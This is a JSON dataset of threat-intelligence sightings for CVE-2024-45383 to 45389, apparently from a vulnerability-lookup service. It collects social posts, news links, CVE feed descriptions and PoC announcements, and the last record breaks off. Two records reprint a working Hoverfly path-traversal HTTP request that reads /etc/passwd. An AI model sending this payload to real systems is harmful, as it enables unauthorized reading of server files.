{"vulnerability": "cve-2024-4538", "sightings": [{"uuid": "1bdcc1a0-ee27-4af8-ab15-7ecde9fd64b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45385", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113826249828255649", "content": "", "creation_timestamp": "2025-01-14T10:32:16.380992Z"}, {"uuid": "81b8bdb4-6573-4ff5-833b-0469a6fef923", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45385", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113826265616304136", "content": "", "creation_timestamp": "2025-01-14T10:36:17.826083Z"}, {"uuid": "ea342916-717e-441f-bfef-d5e95023b2b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "https://bsky.app/profile/bolhasec.com/post/3le4qwtmp262a", "content": "", "creation_timestamp": "2024-12-25T10:30:58.660456Z"}, {"uuid": "6226c29a-5d5b-40a0-9b3d-8f0aabddfeb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "https://bsky.app/profile/dinosn.bsky.social/post/3le53g56xv22m", "content": "", "creation_timestamp": "2024-12-25T13:38:32.591102Z"}, {"uuid": "a53c53ae-fd5f-40fa-8452-9847fd91f27b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3le5djuaaz42y", "content": "", "creation_timestamp": "2024-12-25T16:03:42.962639Z"}, {"uuid": "c057014a-1867-457d-a852-bc261587d557", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "https://bsky.app/profile/nihonmatsu.bsky.social/post/3le5f65t5m223", "content": "", "creation_timestamp": "2024-12-25T16:33:00.132045Z"}, {"uuid": "792d49f2-049c-441f-8fad-0bbe7b9c3848", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "https://thehackernews.com/2024/12/critical-sql-injection-vulnerability-in.html", "content": "", "creation_timestamp": "2024-12-25T12:30:00.000000Z"}, {"uuid": "401b65dd-62e1-46d7-a57f-a4a496cb351d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "https://bsky.app/profile/kyosuke-tanaka.bsky.social/post/3le6uujwsnk2r", "content": "", "creation_timestamp": "2024-12-26T06:46:38.099411Z"}, {"uuid": "b9fcee7e-acf6-425f-aa72-804711967f57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/113718781104713263", "content": "", "creation_timestamp": "2024-12-26T11:01:35.382668Z"}, {"uuid": "c325b789-e71f-425a-9d45-ad3cded4e488", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45385", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lfp4rnw7bz2n", "content": "", "creation_timestamp": "2025-01-14T11:15:55.589144Z"}, {"uuid": "d3c23cfc-9766-47ca-8569-ae9d91e11d53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45385", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lfp6u2oqab2r", "content": "", "creation_timestamp": "2025-01-14T11:53:04.384764Z"}, {"uuid": "05c0f6e4-cd3a-435f-b991-05347d924338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "https://bsky.app/profile/tmjintel.bsky.social/post/3lemh4xv2vd2m", "content": "", "creation_timestamp": "2024-12-31T16:18:02.477269Z"}, {"uuid": "dd9224a6-cb33-4a13-a690-a2c814a32a16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "https://threatintel.cc/2025/01/13/dux-human-health-breach-us.html", "content": "", "creation_timestamp": "2025-01-13T10:44:21.000000Z"}, {"uuid": "89ab2982-d63b-41d1-b8d4-e1834bf6e116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45385", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-016-02", "content": "", "creation_timestamp": "2025-01-16T11:00:00.000000Z"}, {"uuid": "d48b1641-05c3-4d8c-a3f3-817785e21550", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45388", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8495", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aMass Exploit - CVE-2024-45388 - Hoverfly &lt; Arbitrary File Read\nURL\uff1ahttps://github.com/codeb0ss/CVE-2024-45388-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-09T11:38:54.000000Z"}, {"uuid": "e22099b2-48c3-4a02-9a17-9a28d24714ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45386", "type": "seen", "source": "https://t.me/cvedetector/17704", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45386 - Siemens SIMATIC PCS neo Session Hijacking Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45386 \nPublished : Feb. 11, 2025, 11:15 a.m. | 52\u00a0minutes ago \nDescription : A vulnerability has been identified in SIMATIC PCS neo V4.0 (All versions), SIMATIC PCS neo V4.1 (All versions &lt; V4.1 Update 2), SIMATIC PCS neo V5.0 (All versions &lt; V5.0 Update 1), SIMOCODE ES V19 (All versions &lt; V19 Update 1), SIRIUS Safety ES V19 (TIA Portal) (All versions &lt; V19 Update 1), SIRIUS Soft Starter ES V19 (TIA Portal) (All versions &lt; V19 Update 1), TIA Administrator (All versions &lt; V3.0.4). Affected products do not correctly invalidate user sessions upon user logout. This could allow a remote unauthenticated attacker, who has obtained the session token by other means, to re-use a legitimate user's session even after logout. \nSeverity: 8.8 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"11 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-11T13:10:36.000000Z"}, {"uuid": "5c3c6e28-bebc-40e2-95fb-19161b76546c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45383", "type": "published-proof-of-concept", "source": "https://t.me/orderofsixangles/2461", "content": "Deciphering Ransomware in Virtual Machines\n\nUEFI Reverse Engineering, Vulnerability Discovery, and Exploit Development: Part 0\n\nMalware Analysis - ConfuserEx 2 Deobfuscation with Python and dnlib, BBTok Loader\n\nIdentifying Human-operated Ransomware through Windows Event Logs\n\nAPT-C-00 (OceanLotus) Dual Loader and Homologous VMP Loader\n\npoc for CVE-2024-45383\n\nCollection of Docker honeypot logs from 2021 - 2024", "creation_timestamp": "2024-10-01T04:46:46.000000Z"}, {"uuid": "45c6e744-5f20-40ba-b3f1-1f3291f06462", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45388", "type": "published-proof-of-concept", "source": "Telegram/Ov4J2DsXndgwJKzu7I631PpTsnhQ7Z-PoFQvjgZGXhxTpQ", "content": "", "creation_timestamp": "2024-09-09T18:12:56.000000Z"}, {"uuid": "4f6e5394-7c19-4dc6-b9cb-6dc85ee06555", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45389", "type": "seen", "source": "https://t.me/cvedetector/4715", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45389 - Pagefind Remote Domain Hijacking Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45389 \nPublished : Sept. 3, 2024, 8:15 p.m. | 35\u00a0minutes ago \nDescription : Pagefind, a fully static search library, initializes its dynamic JavaScript and WebAssembly files relative to the location of the first script the user loads. This information is gathered by looking up the value of `document.currentScript.src`. Prior to Pagefind version 1.1.1, it is possible to \"clobber\" this lookup with otherwise benign HTML on the page. This will cause `document.currentScript.src` to resolve as an external domain, which will then be used by Pagefind to load dependencies. This exploit would only work in the case that an attacker could inject HTML to a live, hosted, website. In these cases, this would act as a way to escalate the privilege available to an attacker. This assumes they have the ability to add some elements to the page (for example, `img` tags with a `name` attribute), but not others, as adding a `script` to the page would itself be the cross-site scripting vector. Pagefind has tightened this resolution in version 1.1.1 by ensuring the source is loaded from a valid script element. There are no reports of this being exploited in the wild via Pagefind. \nSeverity: 6.4 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"03 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-03T23:19:47.000000Z"}, {"uuid": "834e6050-0e41-4fff-8d03-f3cc0c98945b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1453", "content": "CVE-2024-45387-PoC.py\n\nhttps://github.com/aufzayed/exploit-dev/blob/main/CVE-2024-45387-PoC.py", "creation_timestamp": "2025-01-15T10:47:30.000000Z"}, {"uuid": "92f7c95e-fbba-4a49-80d3-e8f23d3fe4e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45388", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1594", "content": "", "creation_timestamp": "2024-09-20T22:07:31.000000Z"}, {"uuid": "f4b56d37-dd6c-42d5-894d-406e1fe37724", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "published-proof-of-concept", "source": "https://t.me/thehackernews/6088", "content": "\u26a0\ufe0f Apache Traffic Control users\u2014an SQL injection flaw (CVE-2024-45387) has been found, enabling attackers to execute commands directly in your database. \n \nThis flaw is easily exploitable by sending a specially crafted PUT request. \n \n\ud83d\udd27 How to act now: \n\u00bb Update to version 8.0.2 ASAP. \n\u00bb Audit access permissions for high-risk roles. \n\u00bb Double-check database configurations for security loopholes. \n \nRead: https://thehackernews.com/2024/12/critical-sql-injection-vulnerability-in.html", "creation_timestamp": "2024-12-25T14:34:03.000000Z"}, {"uuid": "539a2334-030f-4fbb-875b-0217d79e977d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "https://t.me/CyberBulletin/26930", "content": "\u26a1\ufe0fApache Traffic Control users\u2014an SQL injection flaw (CVE-2024-45387) has been found, enabling attackers to execute commands directly in your database.\n\n#CyberBulletin", "creation_timestamp": "2024-12-27T12:27:48.000000Z"}, {"uuid": "37f82f80-e51a-4176-a2f4-281ae40cc657", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45388", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-15)", "content": "", "creation_timestamp": "2025-05-15T00:00:00.000000Z"}, {"uuid": "e12e0708-c937-4e0d-81ed-b3537305e4af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45383", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8549", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aTheoretically poc for CVE-2024-45383, needs testing and validation. still not done yet.... \nURL\uff1ahttps://github.com/SpiralBL0CK/CVE-2024-45383\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-18T15:42:40.000000Z"}, {"uuid": "ebef6696-ba39-4b15-b776-cc1f8fdeacfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "published-proof-of-concept", "source": "https://t.me/CyberBulletin/1866", "content": "\u26a1\ufe0fCVE-2024-45387: PoC Published for Critical SQL Injection in Apache Traffic Control.\n\n#CyberBulletin", "creation_timestamp": "2024-12-30T13:08:26.000000Z"}, {"uuid": "ea2ce51b-16ae-4c35-aed8-8681cdbec18c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "https://t.me/kasperskyb2b/1574", "content": "\u2b50\ufe0f \u041f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0432 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0438 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411\n\n\ud83d\ude11 \u0423\u0433\u0440\u043e\u0437\u044b \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0410\u0421\u0423 \u0432 3 \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2024 \u0433\u043e\u0434\u0430: \u043e\u0431\u0437\u043e\u0440 \u0438 \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0430. \u0422\u043e\u043f \u0441\u0438\u0441\u0442\u0435\u043c, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0431\u044b\u043b\u0438 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043e\u0431\u044a\u0435\u043a\u0442\u044b, \u0432\u043e\u0437\u0433\u043b\u0430\u0432\u0438\u043b\u0438 \u0431\u0438\u043e\u043c\u0435\u0442\u0440\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b. \n\n\ud83d\uddff \u0420\u0430\u0437\u0431\u043e\u0440 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u044b Masque, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0432 2024 \u0433\u043e\u0434\u0443 \u0438 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0439 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u043e\u0439 \u0432\u044b\u0433\u043e\u0434\u044b.  \u0417\u0430\u0445\u043e\u0434\u044f\u0442 \u0447\u0435\u0440\u0435\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u0442\u0451\u043a\u0448\u0438\u0435 \u0431\u0438\u043b\u0434\u0435\u0440\u044b Lockbit \u0438 Babuk.\n\n\ud83d\ude80 \u0412 \u0444\u0430\u0439\u0440\u0432\u043e\u043b\u0430\u0445 Palo Alto, \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0447\u0435\u0440\u0435\u0437 CVE-2024-9474, \u0432\u044b\u043b\u043e\u0432\u0438\u043b\u0438 \u043d\u043e\u0432\u044b\u0439 \u0431\u044d\u043a\u0434\u043e\u0440 Littlelamb.Wooltea. \u041e\u0447\u0435\u043d\u044c \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0439 \u043e\u0442\u0447\u0451\u0442 \u043e \u043d\u0451\u043c \u0445\u043e\u0440\u043e\u0448\u043e \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442, \u043a\u0430\u043a \u043e\u043f\u044b\u0442\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0430 \u043f\u043e\u0433\u0440\u0430\u043d\u0438\u0447\u043d\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432.\n\n\ud83d\udfe3\u0421\u043f\u0438\u0441\u043e\u043a \u0438\u0437 2,5 \u0442\u044b\u0441\u044f\u0447 IP-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 Astrill VPN, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e\u0447\u0435\u043d\u044c \u043b\u044e\u0431\u044f\u0442 \u0441\u0435\u0432\u0435\u0440\u043e\u043a\u043e\u0440\u0435\u0439\u0441\u043a\u0438\u0435 APT.\n\n\u2764\ufe0f\u041e\u0431\u0437\u043e\u0440 \u0444\u0438\u0448\u0438\u043d\u0433-\u043a\u0438\u0442\u0430 WikiKit, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0435\u0433\u043e \u0441\u0432\u043e\u0451 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u0437\u0430 \u0442\u043e, \u0447\u0442\u043e \u043e\u043d \u043f\u0435\u0440\u0435\u0430\u0434\u0440\u0435\u0441\u0443\u0435\u0442 \u043d\u0435\u043f\u043e\u0434\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0436\u0435\u0440\u0442\u0432 \u043d\u0430 \u0412\u0438\u043a\u0438\u043f\u0435\u0434\u0438\u044e.\n\n\ud83d\ude35\u200d\ud83d\udcab \u041f\u044f\u0442\u044c \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0439 Chrome, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435 \u043e\u0442 \u0418\u0411-\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Cyberhaven, \u0431\u044b\u043b\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0438 \u043f\u043e\u043f\u0430\u043b\u0438 \u0432 \u043c\u0430\u0433\u0430\u0437\u0438\u043d Chrome. \u0415\u0449\u0451 \u043e\u0434\u0438\u043d \u043f\u043e\u0432\u043e\u0434 \u043f\u043e\u0434\u0447\u0438\u043d\u0438\u0442\u044c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0443 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0439 \u0432 \u0425\u0440\u043e\u043c \u0441\u0442\u0440\u043e\u0433\u0438\u043c \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u043c \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0430\u043c.\n\n\ud83d\udfe2\u041d\u043e\u0432\u044b\u0439 \u0434\u0435\u043d\u044c \u2014 \u043d\u043e\u0432\u043e\u0435 \u0412\u041f\u041e \u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f\u0445 open source. \u0422\u0435\u043f\u0435\u0440\u044c \u0447\u0435\u0440\u0435\u0437 PyPi \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0442 \u0441\u0442\u0438\u043b\u0435\u0440\u044b Cometlogger \u0438 Zebo.\n\n\ud83d\udfe3\u0410 Lockbit \u0441\u043e\u0431\u0440\u0430\u043b\u0438\u0441\u044c \u043e\u0442\u043f\u0440\u0430\u0437\u0434\u043d\u043e\u0432\u0430\u0442\u044c \u0433\u043e\u0434\u043e\u0432\u0449\u0438\u043d\u0443 \u0440\u0430\u0437\u0433\u043e\u043d\u0430 \u0433\u0440\u0443\u043f\u043f\u044b \u043f\u0440\u0430\u0432\u043e\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u0435\u043b\u044f\u043c\u0438 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c Lockbit 4.0.\n\n\ud83d\ude35 \u0426\u0435\u043b\u0430\u044f \u043f\u0430\u0447\u043a\u0430 \u0441\u0440\u043e\u0447\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0418\u0422-\u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 \u043e\u043c\u0440\u0430\u0447\u0438\u043b\u0438 \u0430\u0434\u043c\u0438\u043d\u0430\u043c \u043f\u0440\u0430\u0437\u0434\u043d\u0438\u0447\u043d\u044b\u0439 \u0441\u0435\u0437\u043e\u043d. \u041e\u0442\u043c\u0435\u0442\u0438\u043c CVE-2024-52046 \u0432 Apache MINA (CVSS 10), CVE-2024-45387 \u0432 Apache Traffic Ops (CVSS 9.9) \u0438 \u043c\u0435\u043d\u0435\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u0443\u044e CVE-2024-43441 \u0432 OpenGraph. \u0410 \u0434\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u0435\u0434\u0432\u0430 \u0432\u044b\u0434\u043e\u0445\u043d\u0443\u043b, \u0437\u0430\u043b\u0430\u0442\u0430\u0432 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e CVE-2024-50379 \u0432 Apache Tomcat, \u0442\u043e\u0436\u0435 \u0435\u0441\u0442\u044c \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u044b\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u2014 \u0444\u0438\u043a\u0441 \u0431\u044b\u043b \u043d\u0435\u043f\u043e\u043b\u043d\u044b\u043c, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u0439\u0442\u0435 CVE-2024-56337 \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0439\u0442\u0435 \u0441\u043d\u0430\u0447\u0430\u043b\u0430. \u0414\u0430, \u0438 CVE-2024-53677 \u0432 Struts \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c \u043d\u0435 \u0437\u0430\u0431\u0443\u0434\u044c\u0442\u0435.\n\u0421\u043d\u043e\u0432\u0430 \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0438\u0441\u044c \u0438 Palo Alto \u0441 DoS \u0432 PAN-OS (CVE-2024-3393, CVSS 8.7).\n\n\ud83d\udc4b \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435 \u0447\u0442\u0438\u0432\u043e \u043d\u0430 \u0432\u044b\u0445\u043e\u0434\u043d\u044b\u0435: \u043a\u0430\u043a \u043b\u044e\u0431\u0438\u043c\u0430\u044f \u0441\u0442\u0430\u0440\u0442\u0430\u043f\u0430\u043c\u0438 \u0438 \u0434\u0440\u0443\u0433\u0438\u043c\u0438 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u043c\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f\u043c\u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u043e\u0444\u0438\u0441\u043e\u0432 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043b\u0435\u0433\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0444\u0430\u0441\u0430\u0434\u0430 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #APT #\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 @\u041f2\u0422", "creation_timestamp": "2024-12-28T08:57:19.000000Z"}, {"uuid": "37c52ffe-7c28-4204-ad2c-a5d672bd15e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45388", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18531", "content": "CVE-2024-45388\n\nPUT /api/v2/simulation HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n \n{\"data\":{\"pairs\":[{\"request\":{},\"response\":{\"bodyFile\": \"../../../../../../../etc/passwd\",\"x\":\"aaa\"}} ]},\"meta\":{\"schemaVersion\":\"v5.3\"}}\n\n../../../../../../../etc/passwd\n\n#exploit #poc", "creation_timestamp": "2024-09-09T14:58:35.000000Z"}, {"uuid": "6d0967c0-3529-4dac-9730-d991a558f279", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45388", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1943", "content": "CVE-2024-45388\n\nPUT /api/v2/simulation HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n \n{\"data\":{\"pairs\":[{\"request\":{},\"response\":{\"bodyFile\": \"../../../../../../../etc/passwd\",\"x\":\"aaa\"}} ]},\"meta\":{\"schemaVersion\":\"v5.3\"}}\n\n../../../../../../../etc/passwd\n\n#exploit #poc", "creation_timestamp": "2024-09-09T11:01:47.000000Z"}, {"uuid": "06e06b0d-3de0-4e00-8a70-9f392c0a7f54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "published-proof-of-concept", "source": 